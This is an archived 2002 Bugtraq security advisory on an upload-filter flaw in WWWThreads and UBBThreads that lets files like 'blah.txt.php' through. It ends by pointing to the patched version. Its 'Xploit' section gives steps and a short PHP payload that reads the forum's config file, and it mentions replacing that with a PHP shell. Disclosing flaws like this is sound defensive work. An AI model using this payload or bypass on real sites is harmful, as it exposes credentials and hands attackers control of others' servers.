[24037] in bugtraq
[ WWWThreads, UBBThreads ] Security Hole in upload system
daemon@ATHENA.MIT.EDU (Root Extractor)
Wed Jan 30 18:05:17 2002
Date: 30 Jan 2002 22:12:17 -0000
Message-ID: <20020130221217.28688.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Root Extractor <condor@phreaker.net>
To: bugtraq@securityfocus.com
[ WWWThreads, UBBThreads ] Security Hole in
upload system
Author: RootExtractor, CompuMe
condor@phreaker.net, compume2000@hotmail.com
I. Details
II. Vulnerable ver's
III. Example, Xploit
IV. Solution
Details :
..: config.inc.php :..
------------------------- snip ------------------------------
// $config['excludefiles']
= ".php,.asp,.js,.vbs,.sht,.htm";
$config['allowfiles'] = ".zip,.txt,.gif,.jpg,.jpeg,.bmp";
------------------------- snip ------------------------------
that files that were not listed in the allow files could
still be uploaded. Seems you checked the extension
but if someone added an allowable extension first
before the bogus extension the file would upload.
vulnerable :
WWWThreads and UBBThreads 5.5 Dev11 and piror
not vulnerable :
UBBThreads 5.5
Example :
you allow the upload or .txt,.jpg,.bmp,.zip
all files that don't have those extensions should not
be uploaded
However if somebody changes the name of the file to
blah.txt.php the file will validate and upload......huh !
Xploit :
1) make new file $ touch blah.txt.php
2) edit it $ vi blah.txt.php (in this step, write a php
code, for example)
<?php
$readfile = join("", file
("../config.inc.php"));
print $readfile;
?>
3) save & upload it
4) visit your blah file, now you can to see a config file
of your victim forum
5) i'm replaced readfile code by php shell file
Solution :
visit infopop.com and download ubbthreads 5.5
http://www.infopop.com/
Copyright 2002 recm security team
http://hop.to/condor
